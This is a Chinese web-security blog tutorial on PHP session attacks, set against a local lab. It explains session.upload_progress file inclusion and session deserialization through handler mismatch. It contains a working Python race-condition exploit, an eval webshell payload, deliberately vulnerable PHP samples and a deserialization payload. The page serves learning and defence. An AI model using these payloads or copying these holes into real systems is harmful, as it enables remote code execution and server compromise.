



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="welcome to my blog" href="https://hq185187.github.io/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="welcome to my blog" href="https://hq185187.github.io/atom.xml" />
<link rel="alternate" type="application/json" title="welcome to my blog" href="https://hq185187.github.io/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  
  <meta name="keywords" content="java,git,springcloud" />


<link rel="canonical" href="https://hq185187.github.io/2023/07/01/session%E5%AE%89%E5%85%A8/">



  <title>
session安全 |
不良人天藏星 = welcome to my blog = 不良人总舵</title>
<meta name="generator" content="Hexo 6.3.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">session安全
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2023-07-01 14:51:21">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2023-07-01T14:51:21+08:00">2023-07-01</time>
  </span>
  <span class="item" title="本文字数">
    <span class="icon">
      <i class="ic i-pen"></i>
    </span>
    <span class="text">本文字数</span>
    <span>6.2k</span>
    <span class="text">字</span>
  </span>
  <span class="item" title="阅读时长">
    <span class="icon">
      <i class="ic i-clock"></i>
    </span>
    <span class="text">阅读时长</span>
    <span>6 分钟</span>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">不良人天藏星</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
          <img src="/assets/27.jpg">
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="https://hq185187.github.io/2023/07/01/session%E5%AE%89%E5%85%A8/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content="hq185187">
    <meta itemprop="description" content="不良人总舵, 不定时更新web安全相关知识">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="welcome to my blog">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <h2 id="一session文件包含"><a class="markdownIt-Anchor" href="#一session文件包含">#</a> 一.session 文件包含</h2>
<h3 id="前置知识"><a class="markdownIt-Anchor" href="#前置知识">#</a> 前置知识</h3>
<ol>
<li>session.upload_progress 是 PHP5.4 添加的，所以 PHP 版本要 &gt; 5.4</li>
<li>什么是 session.upload_progress? 可以理解为文件上传进度，就是当一个文件上传时，如果我们同时 POST 一个与 session.upload_progress.name 同名的变量，上传进度可以在 <code>$_session</code>  里获得 (也就是那个 session 文件里),PHP 会在 <code>$_session</code>  里创建一个索引是 session.upload_progress.prefix 和 session.upload_progress.name 连接一起的值<br>
<mark>重点</mark>:<br>
 假设我设置:</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">data=&#123;&#x27;PHP_SESSION_UPLOAD_PROGRESS&#x27;: &#x27;&lt;?php eval($_POST[&quot;cmd&quot;]);?&gt;&#x27;&#125;, </span><br></pre></td></tr></table></figure>
<p>此时在 sess_TGAO 里的文件内容就有 <code>upload_progress_&lt;?php eval($_POST[&quot;cmd&quot;]);?&gt;</code> , 此时就可以配合文件包含漏洞来 rce 了</p>
<ol start="3">
<li>几个默认参数</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">1.session.upload_progress.enabled=on</span><br><span class="line">2. session.upload_progress.cleanup = on  </span><br><span class="line">3. session.upload_progress.prefix = &quot;upload_progress_&quot;  </span><br><span class="line">4. session.upload_progress.name = &quot;PHP_SESSION_UPLOAD_PROGRESS&quot;  </span><br><span class="line">5. session.upload_progress.freq = &quot;1%&quot;  </span><br><span class="line">6. session.upload_progress.min_freq = &quot;1&quot;</span><br><span class="line"></span><br><span class="line">`enabled=on`表示`upload_progress`功能开始，也意味着当浏览器向服务器上传一个文件时，php将会把此次文件上传的详细信息(如上传时间、上传进度等)存储在session当中 ；</span><br><span class="line"></span><br><span class="line">`cleanup=on`表示当文件上传结束后，php将会立即清空对应session文件中的内容，这个选项非常重要；</span><br><span class="line"></span><br><span class="line">`name`当它出现在表单中，php将会报告上传进度，最大的好处是，它的值可控；</span><br><span class="line"></span><br><span class="line">`prefix+name`将表示为session中的键名</span><br></pre></td></tr></table></figure>
<h3 id="文件包含利用"><a class="markdownIt-Anchor" href="#文件包含利用">#</a> 文件包含利用</h3>
<p>示例代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$b</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>];</span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span> <span class="variable">$b</span>;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>我们没有可以包含的恶意文件，可以利用 session.upload_progress 将恶意语句写入 session, 再包含 session 文件，但是不知道 session 文件的存放位置</p>
<p>分析:<br>
1. 怎么开启 session_start ()?</p>
<ul>
<li>如果 session.auto_start=On, 则 PHP 在接收请求时会自动初始化 session, 不需要再执行 session_start (), 但默认情况下，这个选项是关闭的</li>
<li>session.use_strict_mode 默认是 0, 此时用户可以自定义 Seesion ID 的。比如我们在 Cookie 里设置 PHPSESSID=TT,PHP 将会在服务器上创建一个文件:/tmp/sess_TT 即使此时用户没有初始化 Session，PHP 也会自动初始化 Session。 并产生一个键值，这个键值有 ini.get (“session.upload_progress.prefix”)+ 由我们构造的 session.upload_progress.name 值组成，最后被写入 sess_文件里。<br>
2. 默认配置 session.upload_progress.cleanup=On 导致文件上传后，session 文件内容立即清空，怎么进行 rce?–条件竞争</li>
</ul>
<p>脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> io  </span><br><span class="line"><span class="keyword">import</span> requests  </span><br><span class="line"><span class="keyword">import</span> threading  </span><br><span class="line">  </span><br><span class="line">sessid = <span class="string">&#x27;TGAO&#x27;</span>  </span><br><span class="line">data = &#123;<span class="string">&quot;cmd&quot;</span>: <span class="string">&quot;system(&#x27;whoami&#x27;);&quot;</span>&#125;  </span><br><span class="line">  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">write</span>(<span class="params">session</span>):  </span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:  </span><br><span class="line">        f = io.BytesIO(<span class="string">b&#x27;a&#x27;</span> * <span class="number">1024</span> * <span class="number">50</span>)  </span><br><span class="line">        resp = session.post(<span class="string">&#x27;http://127.0.0.1:5555/test56.php&#x27;</span>,  </span><br><span class="line">                            data=&#123;<span class="string">&#x27;PHP_SESSION_UPLOAD_PROGRESS&#x27;</span>: <span class="string">&#x27;&lt;?php eval($_POST[&quot;cmd&quot;]);?&gt;&#x27;</span>&#125;,  </span><br><span class="line">                            files=&#123;<span class="string">&#x27;file&#x27;</span>: (<span class="string">&#x27;tgao.txt&#x27;</span>, f)&#125;, cookies=&#123;<span class="string">&#x27;PHPSESSID&#x27;</span>: sessid&#125;)  </span><br><span class="line">  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">read</span>(<span class="params">session</span>):  </span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:  </span><br><span class="line">        resp = session.post(<span class="string">&#x27;http://127.0.0.1:5555/test56.php?file=session/sess_&#x27;</span> + sessid, data=data)  </span><br><span class="line">        <span class="keyword">if</span> <span class="string">&#x27;tgao.txt&#x27;</span> <span class="keyword">in</span> resp.text:  </span><br><span class="line">            <span class="built_in">print</span>(resp.text)  </span><br><span class="line">            event.clear()  </span><br><span class="line">        <span class="keyword">else</span>:  </span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;[+++++++++++++]retry&quot;</span>)  </span><br><span class="line">  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:  </span><br><span class="line">    event = threading.Event()  </span><br><span class="line">    <span class="keyword">with</span> requests.session() <span class="keyword">as</span> session:  </span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> xrange(<span class="number">1</span>, <span class="number">30</span>):  </span><br><span class="line">            threading.Thread(target=write, args=(session,)).start()  </span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> xrange(<span class="number">1</span>, <span class="number">30</span>):  </span><br><span class="line">            threading.Thread(target=read, args=(session,)).start()  </span><br><span class="line">    event.<span class="built_in">set</span>()</span><br></pre></td></tr></table></figure>
<p>过程:<br>
 此脚本的意思是先利用 write 函数，上传一个文件 tgao.txt, 发送 post 请求写 shell 到 session 文件里 ( <code>upload_progress_&lt;?php eval($_POST[&quot;cmd&quot;]);?&gt;</code> ), 然后在进行读取 session 里的执行恶意命令的结果 (whoami), 此时会先判断它的上传过程信息文件里是否有 tgao.txt, 来确定是否 write 函数成功写 shell, 或者还没被删除，如果有 tgao.txt 再 print 出执行恶意命令的结果</p>
<p><mark>注意:</mark><br>
 这个 session 文件的格式大概是这样的:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">upload_progress_&lt;?php eval($_POST[&quot;cmd&quot;]);?&gt;|a:5:&#123;s:10:&quot;start_time&quot;;i:1688050992;s:14:&quot;content_length&quot;;i:51480;s:15:&quot;bytes_processed&quot;;i:5254;s:4:&quot;done&quot;;b:0;s:5:&quot;files&quot;;a:1:&#123;i:0;a:7:&#123;s:10:&quot;field_name&quot;;s:4:&quot;file&quot;;s:4:&quot;name&quot;;s:8:&quot;tgao.txt&quot;;s:8:&quot;tmp_name&quot;;N;s:5:&quot;error&quot;;i:0;s:4:&quot;done&quot;;b:0;s:10:&quot;start_time&quot;;i:1688050992;s:15:&quot;bytes_processed&quot;;i:0;&#125;&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>可以发现注入点还可以在文件名 filename 处 (此处可以构造 session 反序列化漏洞)</p>
<h2 id="二session反序列化"><a class="markdownIt-Anchor" href="#二session反序列化">#</a> 二.session 反序列化</h2>
<p>session 原理流程：<br>
<img data-src="https://image.3001.net/images/20220311/1646988659_622b0d7380818dab56a63.png" alt=""></p>
<h3 id="php-session序列化机制"><a class="markdownIt-Anchor" href="#php-session序列化机制">#</a> PHP session 序列化机制:</h3>
<table>
<thead>
<tr>
<th style="text-align:center">处理器</th>
<th style="text-align:center">对应的存储格式</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:center">php</td>
<td style="text-align:center">键名 + 竖线 + 经过 serialize（） 函数反序列处理的值</td>
</tr>
<tr>
<td style="text-align:center">php_binary</td>
<td style="text-align:center">键名的长度对应的 ASCII 字符 + 键名 + 经过 serialize（） 函数反序列处理的值</td>
</tr>
<tr>
<td style="text-align:center">php_serialize(php&gt;=5.54)</td>
<td style="text-align:center">经过 serialize（） 函数反序列处理的数组</td>
</tr>
</tbody>
</table>
<h4 id="php处理器"><a class="markdownIt-Anchor" href="#php处理器">#</a> php 处理器</h4>
<p>接下来举个例子，我们分析它的过程，：<br>
代码是：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">&#x27;session.serialize_handler&#x27;</span>,<span class="string">&#x27;php&#x27;</span>);</span><br><span class="line"><span class="comment">//这里以php处理器为例</span></span><br><span class="line"><span class="title function_ invoke__">session_start</span>();</span><br><span class="line"></span><br><span class="line"><span class="variable">$_SESSION</span>[<span class="string">&#x27;name&#x27;</span>] = <span class="variable">$_GET</span>[<span class="string">&#x27;name&#x27;</span>];</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$_SESSION</span>[<span class="string">&#x27;name&#x27;</span>];</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>此时我们 url 为？name=hhaa<br>
 过程：</p>
<ol>
<li>产生新的 PHPSESSID（8pj72deu5v3c6d8i7t7qlpnqd5），初始化 <code>$_SESSION</code> , 使用 <code>$_SESSION</code>  存储数据</li>
<li>将 <code>$_SESSION</code>  存储的数据序列化存储为 PHPSESSID 文件（也就是 sess_PHPESEEID 文件）</li>
<li>将包含 PHPSESSID 值的 cookie 通过响应头返回浏览器<br>
此时的文件名为 <code>sess_8pj72deu5v3c6d8i7t7qlpnqd5</code> , 文件内容是:</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">name|s:4:&quot;hhaa&quot;;</span><br></pre></td></tr></table></figure>
<p>格式是键名 ( <code>$_SESSION['name']</code>  的键名 name)+ 竖线 (|)+ 经过 serialize () 函数反序列化处理的值 (s:4:“hhaa”😉</p>
<p>具体图片:<br>
<img data-src="https://s2.loli.net/2023/06/30/6kxeBtsO8KIAPFV.png" alt="屏幕截图 2023-06-30 233321.png"></p>
<h4 id="php_binary处理器"><a class="markdownIt-Anchor" href="#php_binary处理器">#</a> php_binary 处理器</h4>
<p>代码:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">&#x27;session.serialize_handler&#x27;</span>,<span class="string">&#x27;php_binary&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">session_start</span>();</span><br><span class="line"></span><br><span class="line"><span class="comment"># 为了方便ACSII显示，将键名设置为36个字符长度</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$_SESSION</span>[<span class="string">&#x27;namenamenamenamenamenamenamenamename&#x27;</span>] = <span class="variable">$_GET</span>[<span class="string">&#x27;name&#x27;</span>];</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$_SESSION</span>[<span class="string">&#x27;namenamenamenamenamenamenamenamename&#x27;</span>];</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>三种方式的文件命名方式一样的，此时的文件内容:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$namenamenamenamenamenamenamenamenames:4:&quot;hhaa&quot;;</span><br></pre></td></tr></table></figure>
<p>存储格式为：键名的长度对应的 ASCII 字符 ( <code>$</code> )+ 键名 (namenamenamenamenamenamenamenamename)+ 经过 serialize () 函数反序列化后的值 (s:4:“hhaa”😉</p>
<p>图片:<br>
<img data-src="https://s2.loli.net/2023/07/01/kQg2rj7W5UBJMbS.png" alt="屏幕截图 2023-06-30 235836.png"></p>
<h4 id="php_serialize处理器"><a class="markdownIt-Anchor" href="#php_serialize处理器">#</a> php_serialize 处理器</h4>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">&#x27;session.serialize_handler&#x27;</span>,<span class="string">&#x27;php_serialize&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">session_start</span>();</span><br><span class="line"></span><br><span class="line"><span class="variable">$_SESSION</span>[<span class="string">&#x27;name&#x27;</span>] = <span class="variable">$_GET</span>[<span class="string">&#x27;name&#x27;</span>];</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$_SESSION</span>[<span class="string">&#x27;name&#x27;</span>];</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>此时的文件内容是:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a:1:&#123;s:4:&quot;name&quot;;s:4:&quot;hhaa&quot;;&#125;</span><br></pre></td></tr></table></figure>
<h3 id="反序列化漏洞利用"><a class="markdownIt-Anchor" href="#反序列化漏洞利用">#</a> 反序列化漏洞利用</h3>
<p>session 的反序列化漏洞，就是利用 <code>php</code>  处理器和 <code>php_serialize</code>  处理器的存储格式差异而产生</p>
<p>test.php</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">session_start();</span><br><span class="line"></span><br><span class="line">class f4ke&#123;</span><br><span class="line"></span><br><span class="line">    public $name;</span><br><span class="line"></span><br><span class="line">    function __wakeup()&#123;</span><br><span class="line"></span><br><span class="line">      echo &quot;Who are you?&quot;;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function __destruct()&#123;</span><br><span class="line"></span><br><span class="line">      eval($this-&gt;name);</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$str = new f4ke();</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>test1.php</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">ini_set(&#x27;session.serialize_handler&#x27;,&#x27;php_serialize&#x27;);</span><br><span class="line"></span><br><span class="line">session_start();</span><br><span class="line"></span><br><span class="line">$_SESSION[&#x27;session&#x27;] = $_GET[&#x27;session&#x27;];</span><br><span class="line"></span><br><span class="line">echo $_SESSION[&#x27;session&#x27;];</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>首先在 test1.php 里构建 session:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?session=|O:4:&quot;f4ke&quot;:1:&#123;s:4:&quot;name&quot;;s:10:&quot;phpinfo();&quot;;&#125;</span><br></pre></td></tr></table></figure>
<p>此时的 sess_PHPSESSID 文件内容:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a:1:&#123;s:7:&quot;session&quot;;s:45:&quot;|O:4:&quot;f4ke&quot;:1:&#123;s:4:&quot;name&quot;;s:10:&quot;phpinfo();&quot;;&#125;&quot;;&#125;</span><br></pre></td></tr></table></figure>
<p>浏览器保存的 PHPSESSID 文件名是不变的，当我们访问 test.php 时 (这个文件默认是 php 处理器), 根据上面的 session 原理流程图可知:</p>
<ol>
<li>获取 PHPSESSID</li>
<li>初始化 <code>$_SESSION</code></li>
<li>寻找 PHPSESSID 文件，<mark> 反序列化出数据</mark>放在 <code>$_SESSION</code>  中<br>
注意此时反序列化的识别方式变成了 php 处理器的，而不是 php_serialize 的</li>
</ol>
<table s:4:name;s:10:phpinfo();;="">
<thead>
<tr>
<th style="text-align:center">键名</th>
<th style="text-align:center">竖线</th>
<th style="text-align:center">经过 serialize () 函数反序列处理的值</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:center">a:1:{s:7:“session”;s:45:&quot;</td>
<td style="text-align:center">竖线</td>
<td style="text-align:center">O:4:“f4ke”:1:</td>
</tr>
</tbody>
</table>
<p>此时反序列化 <code>O:4:&quot;f4ke&quot;:1:&#123;s:4:&quot;name&quot;;s:10:&quot;phpinfo();&quot;;&#125;</code> , 执行 phpinfo 方法<br>
图片:<br>
<img data-src="https://s2.loli.net/2023/07/01/1Cc8p6z5xNda3UW.png" alt="屏幕截图 2023-07-01 003026.png"></p>

  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2023-07-01 14:59:34" itemprop="dateModified" datetime="2023-07-01T14:59:34+08:00">2023-07-01</time>
  </span>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>hq185187 <i class="ic i-at"><em>@</em></i>welcome to my blog
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="https://hq185187.github.io/2023/07/01/session%E5%AE%89%E5%85%A8/" title="session安全">https://hq185187.github.io/2023/07/01/session安全/</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC96aC1DTg=="><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2023/06/29/%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5/" itemprop="url" rel="prev" data-background-image="&#x2F;assets&#x2F;8.jpg" title="宽字节注入学习">
  <span class="type">上一篇</span>
  <span class="category"><i class="ic i-flag"></i> SQL注入</span>
  <h3>宽字节注入学习</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/2023/07/06/XML%E5%9F%BA%E7%A1%80/" itemprop="url" rel="next" data-background-image="&#x2F;assets&#x2F;2.png" title="XML基础知识">
  <span class="type">下一篇</span>
  <span class="category"><i class="ic i-flag"></i> </span>
  <h3>XML基础知识</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目录">
          <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80session%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="toc-number">1.</span> <span class="toc-text"> 一.session 文件包含</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86"><span class="toc-number">1.1.</span> <span class="toc-text"> 前置知识</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E5%88%A9%E7%94%A8"><span class="toc-number">1.2.</span> <span class="toc-text"> 文件包含利用</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8Csession%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="toc-number">2.</span> <span class="toc-text"> 二.session 反序列化</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#php-session%E5%BA%8F%E5%88%97%E5%8C%96%E6%9C%BA%E5%88%B6"><span class="toc-number">2.1.</span> <span class="toc-text"> PHP session 序列化机制:</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#php%E5%A4%84%E7%90%86%E5%99%A8"><span class="toc-number">2.1.1.</span> <span class="toc-text"> php 处理器</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#php_binary%E5%A4%84%E7%90%86%E5%99%A8"><span class="toc-number">2.1.2.</span> <span class="toc-text"> php_binary 处理器</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#php_serialize%E5%A4%84%E7%90%86%E5%99%A8"><span class="toc-number">2.1.3.</span> <span class="toc-text"> php_serialize 处理器</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">2.2.</span> <span class="toc-text"> 反序列化漏洞利用</span></a></li></ol></li></ol>
      </div>
      <div class="related panel pjax" data-title="系列文章">
      </div>
      <div class="overview panel" data-title="站点概览">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="hq185187"
      data-src="/images/avatar.jpg">
  <p class="name" itemprop="name">hq185187</p>
  <div class="description" itemprop="description">不定时更新web安全相关知识</div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">35</span>
        <span class="name">文章</span>
      </a>
    </div>
    <div class="item categories">
      <a href="/categories/">
        <span class="count">3</span>
        <span class="name">分类</span>
      </a>
    </div>
</nav>

<div class="social">
